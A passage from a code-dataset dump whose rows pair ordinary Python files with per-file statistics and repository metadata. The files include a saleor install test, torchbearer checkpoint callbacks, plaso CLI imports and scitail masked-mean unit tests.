}
settings = get_settings()
response = MagicMock()
response.__getitem__.side_effect = json_failed_response.__getitem__
response.get.side_effect = json_failed_response.get
errors = None
mocked_executor = AsyncMock(return_value=(response, errors))
monkeypatch.setattr(
"saleor_app.install.get_executor", lambda host, auth_token: mocked_executor
)
monkeypatch.setattr("saleor_app.install.secrets.choice", lambda _: "a")
save_app_data_fun = AsyncMock()
events = ["ORDER_CREATED", "PRODUCT_CREATED"]
target_url = "saleor.io/app/webhook-url"
saleor_store_domain = "saleor.io"
saleor_app_token = "saleor-token"
with pytest.raises(InstallAppError):
await install_app(
domain=saleor_store_domain,
token=saleor_app_token,
events=events,
target_url=target_url,
save_app_data=save_app_data_fun,
)
expected_secret_key = "a" * 20
variables = {
"input": {
"targetUrl": target_url,
"events": [event.upper() for event in events],
"name": settings.app_name,
"secretKey": expected_secret_key,
}
}
mocked_executor.assert_awaited_once_with(CREATE_WEBHOOK, variables=variables)
assert not save_app_data_fun.called
| 30.177778
| 87
| 0.638255
| 589
| 5,432
| 5.519525
| 0.168081
| 0.049831
| 0.040603
| 0.038757
| 0.82713
| 0.791449
| 0.791449
| 0.779145
| 0.743156
| 0.743156
| 0
| 0.002012
| 0.267857
| 5,432
| 179
| 88
| 30.346369
| 0.815439
| 0
| 0
| 0.62
| 0
| 0
| 0.138807
| 0.049153
| 0
| 0
| 0
| 0
| 0.04
| 1
| 0
| false
| 0
| 0.046667
| 0
| 0.046667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
4b12822e6d65a0051203be96bd6a9d55228e0811
| 24
|
py
|
Python
|
testsuite/modulegraph-dir/package/diamond_b2.py
|
xoviat/modulegraph2
|
766d00bdb40e5b2fe206b53a87b1bce3f9dc9c2a
|
[
"MIT"
] | 9
|
2020-03-22T14:48:01.000Z
|
2021-05-30T12:18:12.000Z
|
testsuite/modulegraph-dir/package/diamond_b2.py
|
xoviat/modulegraph2
|
766d00bdb40e5b2fe206b53a87b1bce3f9dc9c2a
|
[
"MIT"
] | 15
|
2020-01-06T10:02:32.000Z
|
2021-05-28T12:22:44.000Z
|
testsuite/modulegraph-dir/package/diamond_b1.py
|
ronaldoussoren/modulegraph2
|
b6ab1766b0098651b51083235ff8a18a5639128b
|
[
"MIT"
] | 4
|
2020-05-10T18:51:41.000Z
|
2021-04-07T14:03:12.000Z
|
from . import diamond_c
| 12
| 23
| 0.791667
| 4
| 24
| 4.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 24
| 1
| 24
| 24
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d9b1e45b721b1c4c1a7bb9086b5edb5d571088f0
| 98
|
py
|
Python
|
app/diagnostic/__init__.py
|
benjaminhuanghuang/math_clone
|
8fd5d5ed878559629101c6c33d61f2ead80a652c
|
[
"MIT"
] | null | null | null |
app/diagnostic/__init__.py
|
benjaminhuanghuang/math_clone
|
8fd5d5ed878559629101c6c33d61f2ead80a652c
|
[
"MIT"
] | null | null | null |
app/diagnostic/__init__.py
|
benjaminhuanghuang/math_clone
|
8fd5d5ed878559629101c6c33d61f2ead80a652c
|
[
"MIT"
] | null | null | null |
from flask import Blueprint
diagnostic = Blueprint('diagnostic', __name__)
from . import routes
| 16.333333
| 46
| 0.785714
| 11
| 98
| 6.636364
| 0.636364
| 0.520548
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 98
| 5
| 47
| 19.6
| 0.869048
| 0
| 0
| 0
| 0
| 0
| 0.102041
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 6
|
d9b3557149df02201695555cb8fb1b5b4718254e
| 208
|
py
|
Python
|
users/admin.py
|
MaTachi/sputnik
|
81f170f4ed25c0d0db7816dd875e8ac148ebba3b
|
[
"MIT"
] | null | null | null |
users/admin.py
|
MaTachi/sputnik
|
81f170f4ed25c0d0db7816dd875e8ac148ebba3b
|
[
"MIT"
] | null | null | null |
users/admin.py
|
MaTachi/sputnik
|
81f170f4ed25c0d0db7816dd875e8ac148ebba3b
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from users.models import PersonalUserProfile
class PersonalUserProfileAdmin(admin.ModelAdmin):
pass
admin.site.register(PersonalUserProfile, PersonalUserProfileAdmin)
| 20.8
| 66
| 0.846154
| 20
| 208
| 8.8
| 0.7
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.100962
| 208
| 9
| 67
| 23.111111
| 0.941176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.2
| 0.4
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
d9c95baf8199a4048e75a23cee095f221a7b3ab7
| 96
|
py
|
Python
|
venv/lib/python3.8/site-packages/rope/base/oi/type_hinting/evaluate.py
|
GiulianaPola/select_repeats
|
17a0d053d4f874e42cf654dd142168c2ec8fbd11
|
[
"MIT"
] | 2
|
2022-03-13T01:58:52.000Z
|
2022-03-31T06:07:54.000Z
|
venv/lib/python3.8/site-packages/rope/base/oi/type_hinting/evaluate.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | 19
|
2021-11-20T04:09:18.000Z
|
2022-03-23T15:05:55.000Z
|
venv/lib/python3.8/site-packages/rope/base/oi/type_hinting/evaluate.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
/home/runner/.cache/pip/pool/1f/9b/1e/32db7f302799db2358287293395973ca876e177f4dff9f20e8d171c508
| 96
| 96
| 0.895833
| 9
| 96
| 9.555556
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.46875
| 0
| 96
| 1
| 96
| 96
| 0.427083
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
d9d208eda4c74e9ff892ae39dea8336d6e31fc86
| 14,595
|
py
|
Python
|
torchbearer/callbacks/checkpointers.py
|
NunoEdgarGFlowHub/torchbearer
|
d2b21b8ffcabde5b505cb1c736e05af6ee4276ca
|
[
"MIT"
] | 358
|
2018-07-23T13:30:38.000Z
|
2019-06-02T07:18:35.000Z
|
torchbearer/callbacks/checkpointers.py
|
NunoEdgarGFlowHub/torchbearer
|
d2b21b8ffcabde5b505cb1c736e05af6ee4276ca
|
[
"MIT"
] | 307
|
2018-07-18T12:07:23.000Z
|
2019-06-03T18:00:27.000Z
|
torchbearer/callbacks/checkpointers.py
|
NunoEdgarGFlowHub/torchbearer
|
d2b21b8ffcabde5b505cb1c736e05af6ee4276ca
|
[
"MIT"
] | 42
|
2018-07-23T22:49:23.000Z
|
2019-05-20T07:22:55.000Z
|
import torchbearer
import torch
from torchbearer.callbacks.callbacks import Callback
import os
import warnings
from torchbearer.bases import get_metric
class _Checkpointer(Callback):
def __init__(self, fileformat, save_model_params_only=False, pickle_module=torch.serialization.pickle, pickle_protocol=torch.serialization.DEFAULT_PROTOCOL):
super(_Checkpointer, self).__init__()
self.fileformat = fileformat
self.pickle_module = pickle_module
self.pickle_protocol = pickle_protocol
self.save_model_params_only = save_model_params_only
self.most_recent = None
if fileformat.__contains__(os.sep) and not os.path.exists(os.path.dirname(fileformat)):
os.makedirs(os.path.dirname(fileformat))
def save_checkpoint(self, model_state, overwrite_most_recent=False):
state = {}
state.update(model_state)
state.update(model_state[torchbearer.METRICS])
string_state = {str(key): state[key] for key in state.keys()}
filepath = self.fileformat.format(**string_state)
if self.most_recent is not None and overwrite_most_recent:
try:
os.remove(self.most_recent)
except OSError:
warnings.warn('Failed to delete old file. Are you running two checkpointers with the same filename?')
if self.save_model_params_only:
torch.save(model_state[torchbearer.MODEL].state_dict(), filepath, pickle_module=self.pickle_module,
pickle_protocol=self.pickle_protocol)
else:
torch.save(model_state[torchbearer.SELF].state_dict(), filepath, pickle_module=self.pickle_module,
pickle_protocol=self.pickle_protocol)
self.most_recent = filepath
def ModelCheckpoint(filepath='model.{epoch:02d}-{val_loss:.2f}.pt', save_model_params_only=False,
monitor='val_loss', save_best_only=False, mode='auto', period=1, min_delta=0):
"""Save the model after every epoch. `filepath` can contain named formatting options, which will be filled any
values from state. For example: if `filepath` is `weights.{epoch:02d}-{val_loss:.2f}`, then the model checkpoints
will be saved with the epoch number and the validation loss in the filename. The torch :class:`.Trial` will be
saved to filename.
Example: ::
>>> from torchbearer.callbacks import ModelCheckpoint
>>> from torchbearer import Trial
>>> import torch
# Example Trial (without optimiser or loss criterion) which uses this checkpointer
>>> model = torch.nn.Linear(1,1)
>>> checkpoint = ModelCheckpoint('my_path.pt', monitor='val_acc', mode='max')
>>> trial = Trial(model, callbacks=[checkpoint], metrics=['acc'])
Args:
filepath (str): Path to save the model file
save_model_params_only (bool): If `save_model_params_only=True`, only model parameters will be saved so that
the results can be loaded into a PyTorch nn.Module. The other option, `save_model_params_only=False`,
should be used only if the results will be loaded into a Torchbearer Trial object later.
monitor (str): Quantity to monitor
save_best_only (bool): If `save_best_only=True`, the latest best model according to the quantity
monitored will not be overwritten
mode (str): One of {auto, min, max}. If `save_best_only=True`, the decision to overwrite the current
save file is made based on either the maximization or the minimization of the monitored quantity. For
`val_acc`, this should be `max`, for `val_loss` this should be `min`, etc. In `auto` mode, the direction is
automatically inferred from the name of the monitored quantity.
period (int): Interval (number of epochs) between checkpoints
min_delta (float): If `save_best_only=True`, this is the minimum improvement required to trigger a save
State Requirements:
- :attr:`torchbearer.state.MODEL`: Model should have the `state_dict` method
- :attr:`torchbearer.state.METRICS`: Metrics dictionary should exist
- :attr:`torchbearer.state.SELF`: Self should be the :attr:`torchbearer.Trial` which is running this callback
"""
if save_best_only:
check = Best(filepath, save_model_params_only, monitor, mode, period, min_delta)
else:
check = Interval(filepath, save_model_params_only, period)
return check
class MostRecent(_Checkpointer):
"""Model checkpointer which saves the most recent model to a given filepath. `filepath` can contain named
formatting options, which will be filled any values from state. For example: if `filepath` is
`weights.{epoch:02d}-{val_loss:.2f}`, then the model checkpoints will be saved with the epoch number and the
validation loss in the filename.
Example: ::
>>> from torchbearer.callbacks import MostRecent
>>> from torchbearer import Trial
>>> import torch
# Example Trial (without optimiser or loss criterion) which uses this checkpointer
>>> model = torch.nn.Linear(1,1)
>>> checkpoint = MostRecent('my_path.pt')
>>> trial = Trial(model, callbacks=[checkpoint], metrics=['acc'])
Args:
filepath (str): Path to save the model file
save_model_params_only (bool): If `save_model_params_only=True`, only model parameters will be saved so that
the results can be loaded into a PyTorch nn.Module. The other option, `save_model_params_only=False`,
should be used only if the results will be loaded into a Torchbearer Trial object later.
pickle_module (module): The pickle module to use, default is 'torch.serialization.pickle'
pickle_protocol (int): The pickle protocol to use, default is 'torch.serialization.DEFAULT_PROTOCOL'
State Requirements:
- :attr:`torchbearer.state.MODEL`: Model should have the `state_dict` method
- :attr:`torchbearer.state.METRICS`: Metrics dictionary should exist
- :attr:`torchbearer.state.SELF`: Self should be the :attr:`torchbearer.Trial` which is running this callback
"""
def __init__(self, filepath='model.{epoch:02d}-{val_loss:.2f}.pt', save_model_params_only=False,
pickle_module=torch.serialization.pickle, pickle_protocol=torch.serialization.DEFAULT_PROTOCOL):
super(MostRecent, self).__init__(filepath, save_model_params_only=save_model_params_only,
pickle_module=pickle_module, pickle_protocol=pickle_protocol)
self.filepath = filepath
def on_checkpoint(self, state):
super(MostRecent, self).on_end_epoch(state)
self.save_checkpoint(state, overwrite_most_recent=True)
class Best(_Checkpointer):
"""Model checkpointer which saves the best model according to the given configurations. `filepath` can contain
named formatting options, which will be filled any values from state. For example: if `filepath` is
`weights.{epoch:02d}-{val_loss:.2f}`, then the model checkpoints will be saved with the epoch number and the
validation loss in the filename.
Example: ::
>>> from torchbearer.callbacks import Best
>>> from torchbearer import Trial
>>> import torch
# Example Trial (without optimiser or loss criterion) which uses this checkpointer
>>> model = torch.nn.Linear(1,1)
>>> checkpoint = Best('my_path.pt', monitor='val_acc', mode='max')
>>> trial = Trial(model, callbacks=[checkpoint], metrics=['acc'])
Args:
filepath (str): Path to save the model file
save_model_params_only (bool): If `save_model_params_only=True`, only model parameters will be saved so that
the results can be loaded into a PyTorch nn.Module. The other option, `save_model_params_only=False`,
should be used only if the results will be loaded into a Torchbearer Trial object later.
monitor (str): Quantity to monitor
mode (str): One of {auto, min, max}. If `save_best_only=True`, the decision to overwrite the current save file
is made based on either the maximization or the minimization of the monitored quantity. For `val_acc`, this
should be `max`, for `val_loss` this should be `min`, etc. In `auto` mode, the direction is automatically
inferred from the name of the monitored quantity.
period (int): Interval (number of epochs) between checkpoints
min_delta (float): If `save_best_only=True`, this is the minimum improvement required to trigger a save
pickle_module (module): The pickle module to use, default is 'torch.serialization.pickle'
pickle_protocol (int): The pickle protocol to use, default is 'torch.serialization.DEFAULT_PROTOCOL'
State Requirements:
- :attr:`torchbearer.state.MODEL`: Model should have the `state_dict` method
- :attr:`torchbearer.state.METRICS`: Metrics dictionary should exist, with the `monitor` key populated
- :attr:`torchbearer.state.SELF`: Self should be the :attr:`torchbearer.Trial` which is running this callback
"""
def __init__(self, filepath='model.{epoch:02d}-{val_loss:.2f}.pt', save_model_params_only=False, monitor='val_loss',
mode='auto', period=1, min_delta=0, pickle_module=torch.serialization.pickle,
pickle_protocol=torch.serialization.DEFAULT_PROTOCOL):
super(Best, self).__init__(filepath, save_model_params_only=save_model_params_only,
pickle_module=pickle_module, pickle_protocol=pickle_protocol)
self.min_delta = min_delta
self.mode = mode
self.monitor = monitor
self.period = period
self.epochs_since_last_save = 0
if self.mode not in ['min', 'max']:
if 'acc' in self.monitor:
self.mode = 'max'
else:
self.mode = 'min'
if self.mode == 'min':
self.min_delta *= -1
self.monitor_op = lambda x1, x2: (x1-self.min_delta) < x2
elif self.mode == 'max':
self.min_delta *= 1
self.monitor_op = lambda x1, x2: (x1-self.min_delta) > x2
self.best = None
def state_dict(self):
state_dict = super(Best, self).state_dict()
state_dict['epochs'] = self.epochs_since_last_save
state_dict['best'] = self.best
return state_dict
def load_state_dict(self, state_dict):
super(Best, self).load_state_dict(state_dict)
self.epochs_since_last_save = state_dict['epochs']
self.best = state_dict['best']
return self
def on_start(self, state):
if self.best is None:
self.best = float('inf') if self.mode == 'min' else -float('inf')
def on_checkpoint(self, state):
super(Best, self).on_end_epoch(state)
self.epochs_since_last_save += 1
if self.epochs_since_last_save >= self.period:
self.epochs_since_last_save = 0
current = get_metric('Best Checkpoint', state, self.monitor)
if current is None:
return
if self.monitor_op(current, self.best):
self.best = current
self.save_checkpoint(state, overwrite_most_recent=True)
class Interval(_Checkpointer):
"""Model checkpointer which which saves the model every 'period' epochs to the given filepath. `filepath` can
contain named formatting options, which will be filled any values from state. For example: if `filepath` is
`weights.{epoch:02d}-{val_loss:.2f}`, then the model checkpoints will be saved with the epoch number and the
validation loss in the filename.
Example: ::
>>> from torchbearer.callbacks import Interval
>>> from torchbearer import Trial
>>> import torch
# Example Trial (without optimiser or loss criterion) which uses this checkpointer
>>> model = torch.nn.Linear(1,1)
>>> checkpoint = Interval('my_path.pt', period=100, on_batch=True)
>>> trial = Trial(model, callbacks=[checkpoint], metrics=['acc'])
Args:
filepath (str): Path to save the model file
save_model_params_only (bool): If `save_model_params_only=True`, only model parameters will be saved so that
the results can be loaded into a PyTorch nn.Module. The other option, `save_model_params_only=False`,
should be used only if the results will be loaded into a Torchbearer Trial object later.
period (int): Interval (number of steps) between checkpoints
on_batch (bool): If true step each batch, if false step each epoch.
period (int): Interval (number of epochs) between checkpoints
pickle_module (module): The pickle module to use, default is 'torch.serialization.pickle'
pickle_protocol (int): The pickle protocol to use, default is 'torch.serialization.DEFAULT_PROTOCOL'
State Requirements:
- :attr:`torchbearer.state.MODEL`: Model should have the `state_dict` method
- :attr:`torchbearer.state.METRICS`: Metrics dictionary should exist
- :attr:`torchbearer.state.SELF`: Self should be the :attr:`torchbearer.Trial` which is running this callback
"""
def __init__(self, filepath='model.{epoch:02d}-{val_loss:.2f}.pt', save_model_params_only=False, period=1, on_batch=False, pickle_module=torch.serialization.pickle, pickle_protocol=torch.serialization.DEFAULT_PROTOCOL):
super(Interval, self).__init__(filepath, save_model_params_only=save_model_params_only,
pickle_module=pickle_module, pickle_protocol=pickle_protocol)
self.period = period
self.epochs_since_last_save = 0
if on_batch:
self.on_step_training = self.on_checkpoint
self.on_checkpoint = lambda _: None
def state_dict(self):
state_dict = super(Interval, self).state_dict()
state_dict['epochs'] = self.epochs_since_last_save
return state_dict
def load_state_dict(self, state_dict):
super(Interval, self).load_state_dict(state_dict)
self.epochs_since_last_save = state_dict['epochs']
return self
def on_checkpoint(self, state):
super(Interval, self).on_end_epoch(state)
self.epochs_since_last_save += 1
if self.epochs_since_last_save >= self.period:
self.epochs_since_last_save = 0
self.save_checkpoint(state)
| 48.327815
| 223
| 0.681672
| 1,917
| 14,595
| 5.016693
| 0.10433
| 0.028075
| 0.043673
| 0.055319
| 0.807112
| 0.777269
| 0.75065
| 0.744723
| 0.72611
| 0.715504
| 0
| 0.00498
| 0.229531
| 14,595
| 301
| 224
| 48.488372
| 0.850245
| 0.535389
| 0
| 0.291667
| 0
| 0
| 0.051424
| 0.022152
| 0
| 0
| 0
| 0
| 0
| 1
| 0.116667
| false
| 0
| 0.05
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
d9e759310c2966aaf37e58b76b551d9e8e40db8a
| 1,886
|
py
|
Python
|
plaso/cli/helpers/__init__.py
|
dfrc-korea/plaso
|
2c74c3586f94d3ddf9ff523fbdc8cb42d950a109
|
[
"Apache-2.0"
] | 27
|
2019-04-05T12:01:49.000Z
|
2022-02-08T02:26:25.000Z
|
plaso/cli/helpers/__init__.py
|
dfrc-korea/plaso
|
2c74c3586f94d3ddf9ff523fbdc8cb42d950a109
|
[
"Apache-2.0"
] | null | null | null |
plaso/cli/helpers/__init__.py
|
dfrc-korea/plaso
|
2c74c3586f94d3ddf9ff523fbdc8cb42d950a109
|
[
"Apache-2.0"
] | 8
|
2019-11-28T08:06:34.000Z
|
2020-08-29T13:53:30.000Z
|
# -*- coding: utf-8 -*-
"""This file imports Python modules that register CLI helpers."""
from plaso.cli.helpers import analysis_plugins
from plaso.cli.helpers import artifact_definitions
from plaso.cli.helpers import artifact_filters
from plaso.cli.helpers import data_location
from plaso.cli.helpers import date_filters
from plaso.cli.helpers import dynamic_output
from plaso.cli.helpers import elastic_output
from plaso.cli.helpers import event_filters
from plaso.cli.helpers import extraction
from plaso.cli.helpers import filter_file
from plaso.cli.helpers import hashers
from plaso.cli.helpers import language
from plaso.cli.helpers import mysql_4n6time_output
from plaso.cli.helpers import nsrlsvr_analysis
from plaso.cli.helpers import output_modules
from plaso.cli.helpers import parsers
from plaso.cli.helpers import profiling
from plaso.cli.helpers import process_resources
from plaso.cli.helpers import sessionize_analysis
from plaso.cli.helpers import sqlite_4n6time_output
from plaso.cli.helpers import status_view
from plaso.cli.helpers import storage_file
from plaso.cli.helpers import storage_format
from plaso.cli.helpers import tagging_analysis
from plaso.cli.helpers import temporary_directory
from plaso.cli.helpers import text_prepend
from plaso.cli.helpers import timesketch_output
from plaso.cli.helpers import viper_analysis
from plaso.cli.helpers import virustotal_analysis
from plaso.cli.helpers import windows_services_analysis
from plaso.cli.helpers import xlsx_output
from plaso.cli.helpers import yara_rules
from plaso.cli.helpers import workers
from plaso.cli.helpers import mariasql_4n6time_output
# These modules do not register CLI helpers, but contain super classes used by
# CLI helpers in other modules.
from plaso.cli.helpers import database_config
from plaso.cli.helpers import server_config
from plaso.cli.helpers import shared_4n6time_output
| 42.863636
| 78
| 0.852598
| 288
| 1,886
| 5.458333
| 0.256944
| 0.254453
| 0.282443
| 0.447201
| 0.704835
| 0.498092
| 0.048346
| 0
| 0
| 0
| 0
| 0.005288
| 0.097561
| 1,886
| 43
| 79
| 43.860465
| 0.918331
| 0.100212
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8a72705f412db17bc53e6f67f3d20be61223f0f5
| 5,810
|
py
|
Python
|
tests/nn/util_test.py
|
allenai/scitail
|
2e57f46a4620d50e85323c4a642114426db67393
|
[
"Apache-2.0"
] | 40
|
2018-02-01T04:20:50.000Z
|
2022-03-08T02:31:08.000Z
|
tests/nn/util_test.py
|
allenai/scitail
|
2e57f46a4620d50e85323c4a642114426db67393
|
[
"Apache-2.0"
] | 6
|
2018-02-06T03:41:00.000Z
|
2018-10-22T06:13:59.000Z
|
tests/nn/util_test.py
|
allenai/scitail
|
2e57f46a4620d50e85323c4a642114426db67393
|
[
"Apache-2.0"
] | 8
|
2018-02-08T09:06:16.000Z
|
2019-07-17T23:12:17.000Z
|
# pylint: disable=invalid-name,no-self-use,too-many-public-methods
import numpy
import torch
from allennlp.common.testing import AllenNlpTestCase
from numpy.testing import assert_array_almost_equal
from torch.autograd import Variable
from scitail.nn import util
class TestNnUtil(AllenNlpTestCase):
def test_masked_mean_no_mask(self):
# Testing the general unmasked 1D case.
vector_1d = Variable(torch.FloatTensor([[1.0, 2.0, 3.0]]))
dim = 1
vector_1d_mean = util.masked_mean(vector_1d, dim, None).data.numpy()
assert_array_almost_equal(vector_1d_mean,
numpy.array([2.0]))
# Testing the unmasked 1D case where the input is all 0s.
vector_zero = Variable(torch.FloatTensor([[0.0, 0.0, 0.0]]))
vector_zero_mean = util.masked_mean(vector_zero, dim, None).data.numpy()
assert_array_almost_equal(vector_zero_mean,
numpy.array([0.0]))
# Testing the unmasked batched case where one of the inputs are all 0s.
matrix = Variable(torch.FloatTensor([[1.0, 2.0, 5.0], [0.0, 0.0, 0.0]]))
masked_matrix_mean = util.masked_mean(matrix, dim, None).data.numpy()
assert_array_almost_equal(masked_matrix_mean,
numpy.array([2.666666, 0.0]))
def test_masked_mean_masked(self):
# Testing the general masked 1D case.
vector_1d = Variable(torch.FloatTensor([[1.0, 2.0, 5.0]]))
mask_1d = Variable(torch.FloatTensor([[1.0, 0.0, 1.0]]))
dim = 1
vector_1d_mean = util.masked_mean(vector_1d, dim, mask_1d).data.numpy()
assert_array_almost_equal(vector_1d_mean,
numpy.array([3.0]))
vector_1d = Variable(torch.FloatTensor([[0.0, 2.0, 3.0, 4.0]]))
mask_1d = Variable(torch.FloatTensor([[1.0, 0.0, 1.0, 1.0]]))
vector_1d_mean = util.masked_mean(vector_1d, dim, mask_1d).data.numpy()
assert_array_almost_equal(vector_1d_mean,
numpy.array([2.333333]))
# Testing the masked 1D case where the input is all 0s and the mask
# is not all 0s.
vector_1d = Variable(torch.FloatTensor([[0.0, 0.0, 0.0, 0.0]]))
mask_1d = Variable(torch.FloatTensor([[0.0, 0.0, 0.0, 1.0]]))
vector_1d_mean = util.masked_mean(vector_1d, dim, mask_1d).data.numpy()
assert_array_almost_equal(vector_1d_mean,
numpy.array([0]))
# Testing the masked 1D case where the input is not all 0s
# and the mask is all 0s.
vector_1d = Variable(torch.FloatTensor([[0.0, 2.0, 3.0, 4.0]]))
mask_1d = Variable(torch.FloatTensor([[0.0, 0.0, 0.0, 0.0]]))
vector_1d_mean = util.masked_mean(vector_1d, dim, mask_1d).data.numpy()
assert_array_almost_equal(vector_1d_mean,
numpy.array([0.0]))
# Testing the masked 1D case where the input is all 0s and
# the mask is all 0s.
vector_1d = Variable(torch.FloatTensor([[0.0, 0.0, 0.0, 0.0]]))
mask_1d = Variable(torch.FloatTensor([[0.0, 0.0, 0.0, 0.0]]))
vector_1d_mean = util.masked_mean(vector_1d, dim, mask_1d).data.numpy()
assert_array_almost_equal(vector_1d_mean,
numpy.array([0.0]))
# Testing the general masked batched case.
matrix = Variable(torch.FloatTensor([[1.0, 2.0, 5.0], [1.0, 2.0, 3.0]]))
mask = Variable(torch.FloatTensor([[1.0, 0.0, 1.0], [1.0, 1.0, 1.0]]))
masked_matrix_mean = util.masked_mean(matrix, 1, mask).data.numpy()
assert_array_almost_equal(masked_matrix_mean,
numpy.array([3.0, 2.0]))
masked_matrix_mean = util.masked_mean(matrix, 0, mask).data.numpy()
assert_array_almost_equal(masked_matrix_mean,
numpy.array([1.0, 2.0, 4.0]))
# Testing the masked batch case where one of the inputs is all 0s but
# none of the masks are all 0.
matrix = Variable(torch.FloatTensor([[0.0, 0.0, 0.0], [1.0, 2.0, 3.0]]))
mask = Variable(torch.FloatTensor([[1.0, 0.0, 1.0], [1.0, 1.0, 1.0]]))
masked_matrix_mean = util.masked_mean(matrix, 1, mask).data.numpy()
assert_array_almost_equal(masked_matrix_mean,
numpy.array([0.0, 2.0]))
masked_matrix_mean = util.masked_mean(matrix, 0, mask).data.numpy()
assert_array_almost_equal(masked_matrix_mean,
numpy.array([0.5, 2.0, 1.5]))
# Testing the masked batch case where one of the inputs is all 0s and
# one of the masks are all 0.
matrix = Variable(torch.FloatTensor([[0.0, 0.0, 0.0], [1.0, 2.0, 3.0]]))
mask = Variable(torch.FloatTensor([[1.0, 0.0, 1.0], [0.0, 0.0, 0.0]]))
masked_matrix_mean = util.masked_mean(matrix, 1, mask).data.numpy()
assert_array_almost_equal(masked_matrix_mean,
numpy.array([0.0, 0.0]))
masked_matrix_mean = util.masked_mean(matrix, 0, mask).data.numpy()
assert_array_almost_equal(masked_matrix_mean,
numpy.array([0.0, 0.0, 0.0]))
matrix = Variable(torch.FloatTensor([[0.0, 0.0, 0.0], [1.0, 2.0, 3.0]]))
mask = Variable(torch.FloatTensor([[0.0, 0.0, 0.0], [1.0, 0.0, 1.0]]))
masked_matrix_mean = util.masked_mean(matrix, 1, mask).data.numpy()
assert_array_almost_equal(masked_matrix_mean,
numpy.array([0.0, 2.0]))
masked_matrix_mean = util.masked_mean(matrix, 0, mask).data.numpy()
assert_array_almost_equal(masked_matrix_mean,
numpy.array([1.0, 0.0, 3.0]))
| 52.342342
| 80
| 0.595525
| 877
| 5,810
| 3.760547
| 0.079818
| 0.060643
| 0.064585
| 0.060643
| 0.852032
| 0.843845
| 0.836264
| 0.826258
| 0.816252
| 0.792298
| 0
| 0.076579
| 0.269535
| 5,810
| 110
| 81
| 52.818182
| 0.700518
| 0.12685
| 0
| 0.575
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2125
| 1
| 0.025
| false
| 0
| 0.075
| 0
| 0.1125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
8a89d4d2cb1c3d6a7d9dc787c7e2530446adbfe2
| 21
|
py
|
Python
|
unittest/sphinxExer/src/moge.py
|
terasakisatoshi/pythonCodes
|
baee095ecee96f6b5ec6431267cdc6c40512a542
|
[
"MIT"
] | null | null | null |
unittest/sphinxExer/src/moge.py
|
terasakisatoshi/pythonCodes
|
baee095ecee96f6b5ec6431267cdc6c40512a542
|
[
"MIT"
] | null | null | null |
unittest/sphinxExer/src/moge.py
|
terasakisatoshi/pythonCodes
|
baee095ecee96f6b5ec6431267cdc6c40512a542
|
